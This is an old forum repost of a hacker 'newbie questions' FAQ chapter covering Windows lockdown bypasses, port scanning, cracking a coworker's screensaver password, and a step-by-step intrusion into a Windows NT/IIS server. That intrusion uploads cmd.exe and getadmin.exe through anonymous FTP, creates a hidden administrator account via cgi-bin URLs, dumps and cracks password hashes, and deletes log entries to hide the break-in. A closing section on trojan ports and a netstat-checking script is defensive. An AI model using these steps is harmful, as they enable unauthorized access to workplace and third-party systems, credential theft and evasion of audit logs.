Chapter 3 of Newbie Questions answered - Same as the last two chapters, I didn't write 'em.
____________________________________________________
Past two chapters -

Chapter 1 -
http://www.antionline.com/showthread...hreadid=134048

Chapter 2 -
http://www.antionline.com/showthread...hreadid=134563
____________________________________________________

Topics covered in Chapter 3 -

At my workplace, loads of things in Windows are disabled, how can I access them?
Can you explain this telnet / ports thing in a bit more detail?
How can I get round a passworded screen saver?
What are some good techniques of breaking into Windows NT from the Internet?
What open ports should I look out for on my own computer? (Trojan Detection)

--------------------------------------------------------------------------------

At my workplace, loads of things in Windows are disabled, how can I access them?

Right, well I have been faced with this as well! I think my workplace was using a program called 'WinLock 95' which would disable a number of things, including:

"My Computer"
The control panel - and any of the other ways of getting to programs in it
Items on the start menu
Network items

Most people found this annoying. It meant that you couldn't change your wallpaper/screensaver/default printer etc. You are stuck with what they give you! Well, wouldn't it be great to get round this? Well, yeah!

Go to the start menu, there should still be the option of 'Help' (I don't think this would be disabled) open it and go to 'Index'. Right, now you can access help for various items of Windows. So, let's think of something that they have disabled...hmmm, how about Add/Remove Programs! In the help index type "add/". The help topic 'add/remove programs' should be highlighted - select it. Then choose 'Removing a program from your computer'. The help topic is displayed - see the little clickable object that says "Click here to open the Add/Remove Programs dialog box." CLICK IT! BINGO! You're in Add/Remove Programs!

Now, if you wanted full control back, you could try looking through the program list for the protection program (e.g. WinLock) and removing it!

Try this technique with all the disabled items, such as display properties, modem properties, printers, keyboard settings etc.


--------------------------------------------------------------------------------

Can you explain this telneting thing in a bit more detail?

Well, ok. Here's what we established in Volume 1:

Telnet is a program that allows you to connect to other computers using ports. Every computer/server has ports, the most common ones you would see when using telnet are:

Port 21: FTP
Port 23: Telnet
Port 25: SMTP (Mail)
Port 37: Time
Port 43: Whois
Port 79: Finger

So, for example you could tell Telnet to connect to mail.virgin.net on port 25. This would connect you to Virgin's mail server.

Well, that's the basic principle anyway. How do we get into Telnet? Here's how:

Windows 9x - Telnet.exe will be installed if you have Dial Up Networking (DUN) installed. It should be in the c:\windows\ directory by default. If you can't find it try using the Start Menu - Find to get hold of it.
Windows 3.x - Look for a program called 'Terminal.exe' which is the equivalent (I believe). I am not a user of Win 3.x so you will have to find that yourself (or you could upgrade Windows hint, hint!).
Windows NT - I am pretty sure that Telnet does not come with Windows NT. You may have to go on the net and find an alternative. Try http://www.winfiles.com
Unix/Linux systems - type Telnet at the prompt (syntax: Telnet <Hostname> <Port>)

Telnet is a simple program with few options. It's a good program to use, and I still use it, although I have found a good alternative at http://www.vector.co.jp/authors/VA002416/teraterm.html called "Tera Term Pro". You can find Telnet alternatives all over the net, try http://www.winfiles.com for a replacement.

Ok, we will assume you are using Telnet. It is pretty straightforward to connect to something, so I leave that for you to work out! Obviously to connect you will need two things, the hostname (or IP address), and the port on which to connect. Ports are like doors on a computer through which information can either enter or leave. The ports we are referring to are not like printer ports or keyboard ports (although the fundamental idea of information going in and out of a port is the same) on your computer at home, these are more - well, internet ports - invisible ports if you like. When you connect to a port you will usually get some kind of response on your screen. This is because there is a program running on each port to let you communicate with the host. These programs are called 'Services'. Here is a larger listing of the ports you will probably encounter:

#    Name
7    echo
9    discard
11   systat
13   daytime
15   netstat
17   qotd
19   chargen
20   ftp-data
21   ftp
23   telnet
25   smtp
37   time
42   name
43   whois
53   domain
57   mtp
77   rje
79   finger
80   HTTP
87   link
95   supdup
101  hostnames
102  iso-tsap
103  dictionary
104  x400-snd
105  csnet-ns
109  pop
110  pop3
111  portmap
113  auth
115  sftp
117  path
119  nntp
139  nbsession
144  NeWS
158  repo
170  print-srv
175  vmnet
400  vmnet0
512  exec
513  login
514  shell
515  printer
520  efs
526  tempo
530  courier
531  conference
532  netnews
540  uucp
543  klogin
544  kshell
556  remotefs
600  garcon
601  maitrd
602  busboy
750  kerberos
751  kerberos_master
754  krb_prop
888  erlogin

You will grow to recognise which ports you are most likely to see open on a server, but hey! How do you find out what ports are open? You need a port scanner! There are literally hundreds of scanners around, try downloading the WangScript Wartools from http://come.to/wangscript - it contains a good port scanner. A port scanner will basically scan a hostname or IP address on the port range you specify. It will then return only the ports that are open for connections.

Anyway, back to what I was saying - you will learn to guess what ports are likely to be open. For example, if I port scan mail.btinternet.com I can instantly tell you that the most likely ports to be open are 25 and 110 (the mail ports, SMTP and POP3). Let's look at a couple of example situations that you should look out for. If I scanned the IP address 192.169.22.127 and found:

[7]
[9]
[11]
[13]
[21]
[23]
[25]
[79]
[80]
[110]
[113]
[143]

These are all the open ports on that IP address. Now, I will say that most IP addresses you scan will not reveal anywhere near this amount, but if you get an IP address of someone running Unix or Linux then you might get a few ports open. This result is interesting. From this we can see that a lot of very important ports have been left open - this makes me think of a few possibilities. This could be some kind of large server which needs a lot of ports open for various things (It should therefore be pretty secure). However, it could also be some complete retard! Someone who has installed unix and doesn't know what to do to secure his comp. It could also however, be some kind of trap! Someone might be waiting for you to hack this computer so they can bust you.

So, how do we find out? Well, we cautiously connect to a few ports just to see what we are greeted with. It may even tell us what the computer is or who it is owned by. Let's look at another example scan:

[22]
[23]
[25]
[37]
[70]
[109]
[110]
[143]

This is different. Although there are a lot of open ports, some of the more important ports are closed. Notice there is no Echo(7), DayTime(13), NetStat(15), FTP(21) or Finger(79) ports open. This suggests this is run by someone who is very cautious of people prying - a system administrator perhaps? Remember you can also scan Hostnames, you do not have to use the IP address - so you could port scan mail.btinternet.com or www.microsoft.com.

Have a play and see what you can find!


--------------------------------------------------------------------------------

How can I get round a passworded screen saver?

Ok, why would you want to do this? Well, say someone you work with always leaves their computer on, but with a passworded screensaver running - how would we break through it and get access? Another situation might be a computer shop (although these tend to take further precautions which I can't go through here) which uses passworded screensavers to stop the customers tampering.

To get round this, try these techniques:

1> Always try the key combination ctrl + alt + delete to try to bring up the 'close programs' dialog box. This hardly ever works, but sometimes it does. If it works and you see the box, look through the list of running programs and close down the screensaver.

2> Try turning off the computer, then switching it back on. I know this sounds weird, but you probably have a better chance of cracking through the boot up/windows log on passwords. Try the break in techniques mentioned in FAQ volume 2.

3> Wait until you see him go away from his computer for just a little while, assuming the screensaver isn't yet running - use a screen saver cracker program to give you the password (I made one called ScrCrack which cracks Windows 3.x and 9x screensaver passwords - it's on the website at http://welcome.to/wangsdomain ). You can then break in with the password without him knowing when he goes to lunch or something. It's always more fun to know the password! (perhaps it's his password for other things as well? Such as the network password?).

4> When he leaves, boot the computer into DOS (using one of the break in techniques in Volume 2) and then copy the file c:\windows\user.dat to a floppy disk (or if Windows profiles are being used, copy c:\windows\profiles\(his username)\user.dat). Then put this file on your computer and tell your screensaver cracker to crack it (It is able to crack the user.dat file taken from another computer as well!).

5> This is the almost-bound-to-work method. You need to get hold of a Screensaver cracking CD. Here's what happens: The screensaver is running - you put the CD in the drive and AS LONG AS the CD autoplay facility on the CDROM is on - it will run a program which decrypts the screen saver password, closes the screen saver, and then tells you what the password was. I made one of these CDs recently, and they work like magic (as long as Autoplay CD is on). It is now available to buy from the site, yes, buy! Basically because I have spent a long time ensuring it works efficiently, and does the job well. Buy from here


--------------------------------------------------------------------------------

What are some good techniques of breaking into a Windows NT machine from the Internet?

First of all, if you are planning to hack Windows NT, then you should really have a computer at home loaded with it so you can plan how to do it. Anyway, I have never had the need to break into Windows NT, but I have read some things about it, so here's what I know about it. This first method demonstrates how to break in via the Internet:

Find a server running IIS

Open a DOS window and type ' FTP <the company name>'. So you might type:

c:\Ftp www.dodgyinc.com

You may not get a connection, it depends whether the server is running an FTP service. Keep trying and find one that does. Once you connect, you will get something like this:

Connected to www.dodgyinc.com.

220 Vdodgy Microsoft FTP Service (Version 3.0).

User (www.dodgyinc.com:(none)):

This little piece of information is important, it tells us the NetBIOS name of the computer - Vdodgy. From this you can deduce the name of the anonymous internet account that is used by NT to allow people to anonymously use the WWW, FTP and Gopher services on the machine. If the default account hasn't been changed, the anonymous internet account will be called IUSR_VDODGY. This information will be needed later if you're going to gain Administrator access to the machine. Enter "anonymous" as the user and the following appears:

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

Now, the password could be anything. However, try just hitting enter and see if you get in, then try typing the password as 'anonymous'. If all fails, log in to the FTP service again - not using anonymous, but using 'Guest'. Then try hitting enter or using 'guest' for the password.

Now type 'cd /c' and then see if you can actually put any files on to the server (i.e. check whether write permission is enabled on this FTP server). It works? OK, now look for a directory called 'cgi-bin'. If there is one, then you're in luck. Usually a system admin might have one so that he can remotely make changes to the system. The cgi-bin directory can contain programs which you can run from your web browser. Hacking ahoy!

Change to the cgi-bin directory and change the type to 'I' using the 'Binary' command. Then type 'put cmd.exe'. Next you will need two hacking files from the internet. I can not give you any download addresses, but look on the net for 'getadmin.exe' and 'gasys.dll'. Once you have them, put them into the cgi-bin directory as well. Now close the command prompt window.

Now, use your browser to go to: http://www.dodgyinc.com/cgi-bin/geta...xe?IUSR_VDODGY

After a few seconds this will appear:

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

Congratulations , now account IUSR_VDODGY have administrator rights!

You just made the anonymous user account equal to administrator! Now you want to create your own account on the system (with supervisor rights obviously!). Type in:

http://www.dodgyinc.com/cgi-bin/cmd....iammole%20/add

That will create an account login of 'Mole' with the password 'iammole'. Now we need to give it administrator privileges:

http://www.dodgyinc.com/cgi-bin/getadmin.exe?mole

Now disconnect and go to the start menu -> find and search for the computer 'www.dodgyinc.com'.

When it is found, right click on the "computer" and then click on Explore. NT Explorer opens (I told you to use NT for this!) and after a little wait you are prompted for a user-name and password. Enter "mole" and "iammole".

Admin rights for the computer www.dodgyinc.com are appended to your own security access token...now you can do anything. Using NT Explorer, map a drive to the hidden system share C$. Change to the 'Winnt\system32\logfiles' directory and open up the logfile for that day. Now delete all of the log entries which point in any way to you, then save it. If you get a message about sharing violations, change the date on the computer with the following URL:

http://www.dodgyinc.com/cgi-bin/cmd....ate%2002/02/98

Now use the registry editor to connect to the computer. Now you need to have a program called 'l0pht crack' available from:

http://www.l0pht.com

Use the program to dump the SAM (security accounts manager) on the server and then start cracking the passwords. Now to cover your tracks once more, delete 'cmd.exe', 'getadmin.exe', and 'gasys.dll' from 'cgi-bin'. Now check the security event log for the remote NT server using Event Viewer to see if there are any traces there. Finally using User Manager for Domains, remove admin rights from the IUSR_VDODGY account and delete the 'Mole' account. You don't need this account anymore....L0phtcrack will be able to brute force all the accounts. Next time you connect to this machine it will be using the Administrator account because you will have cracked the password!

This is just one vulnerability that was discovered a while back, for up to date findings refer to websites such as:

http://www.rootshell.com

http://www.antionline.com


--------------------------------------------------------------------------------

What open ports should I look out for on my own computer? (Trojan Detection)

If you have port scanned yourself and found some suspicious open ports - you're bound to be worried! Really, on your comp you should know exactly what ports to expect to see open. As we have said before, a trojan is an independent program that appears to perform a useful function but that hides another unauthorized program inside it. When an authorized user performs the apparent function, the trojan horse performs the unauthorized function as well (often usurping the privileges of the user). This is not always the case. Some of the trojans being distributed today (eg. Netbus) are made up of two programs - a client and a server. The server program is the program which will infect the victim's computer. For example the netbus trojan server program used to be called 'Patch.exe'. When someone ran it, nothing seemed to happen so they forgot about it - but in fact it made the person's computer open up and listen on port 12345 for any connections. Then someone else could use the client program as a kind of control panel to control the other person's PC.

Here are some of the most common trojans and what ports they infect: -

PORT   TROJAN
21     Blade Runner
21     WinCrash
31     Hackers Paradise
456    Hackers Paradise
666    Back Orifice
1080   Netbus Pro
1243   SubSeven
3024   WinCrash
6670   Deep Throat
6671   Deep Throat
12345  NetBus
21544  Girl Friend
26274  Delta Trojan
31337  Back Orifice
47264  Delta Trojan

Now, these are just the default ports that these trojans infect...SOME of the trojans allow you to specify which port to open on the person's computer - so be warned. Also, some of the open ports on your computer may be legitimate - for example, just because your port 21 is open it doesn't mean you have the WinCrash trojan - you might be running an FTP server?
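As an added example (not part of the original FAQ), here is the check the paragraph above describes, done on your own machine: take the listening ports from netstat output, compare them against the FAQ's table of default trojan ports, and treat a hit on a port you run on purpose (the FTP server on 21) as "verify" rather than "infected". The netstat text is constructed sample data and the EXPECTED_PORTS allow-list is hypothetical.

```python
# Added example, not from the original FAQ: flag listening ports that
# match the default trojan ports in the table above. The netstat text
# below is constructed sample data; the allow-list is hypothetical.
import re

# Default ports from the FAQ's table (port -> trojan names).
TROJAN_PORTS = {
    21: "Blade Runner/WinCrash", 31: "Hackers Paradise",
    456: "Hackers Paradise", 666: "Back Orifice", 1080: "Netbus Pro",
    1243: "SubSeven", 3024: "WinCrash", 6670: "Deep Throat",
    6671: "Deep Throat", 12345: "NetBus", 21544: "Girl Friend",
    26274: "Delta Trojan", 31337: "Back Orifice", 47264: "Delta Trojan",
}

# Ports you run on purpose (the FAQ's caveat: port 21 may just be your
# own FTP server). Hypothetical allow-list for this example.
EXPECTED_PORTS = {21}

# Constructed sample of Windows-style `netstat -an` output.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:21             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1027       10.0.0.9:80            ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""

# proto, local port, optional state column
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+\S+:(\d+)\s+\S+\s*(\w+)?")

def listening_ports(netstat_text):
    """Return the set of local TCP ports in LISTENING state."""
    ports = set()
    for line in netstat_text.splitlines():
        m = LINE_RE.match(line)
        if m and m.group(1) == "TCP" and m.group(3) == "LISTENING":
            ports.add(int(m.group(2)))
    return ports

def classify(netstat_text, expected=EXPECTED_PORTS):
    """Give each listening port a verdict: expected, unknown, or trojan default."""
    verdicts = {}
    for port in sorted(listening_ports(netstat_text)):
        name = TROJAN_PORTS.get(port)
        if port in expected:
            # Known service on this box; still worth a look if it is also a trojan default.
            verdicts[port] = "expected" + (" (also default of %s)" % name if name else "")
        elif name is None:
            verdicts[port] = "unknown - identify the service"
        else:
            verdicts[port] = "default port of %s - investigate" % name
    return verdicts
```

Run classify() over the output of `netstat -an` on your own machine; anything marked "unknown" still needs identifying, since a trojan configured to use a non-default port will not appear in the table.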

If you are infected with any of them, try doing a search in http://www.altavista.com or http://www.metacrawler.com for a fix. (uraloony's own addition - http://www.google.com/)

To avoid getting infected with any of these, make sure you follow these guidelines: -

Don't accept files over IRC...especially .exe files, .com files, or .dll's
Get a virus scanner and regularly download updated virus definition files from the net
Virus scan all downloads you make from the net
Don't run any files sent to you over email or ICQ
Make sure no-one but you has physical access to your computer - use passwords!
Live in a cardboard box and destroy your computer and modem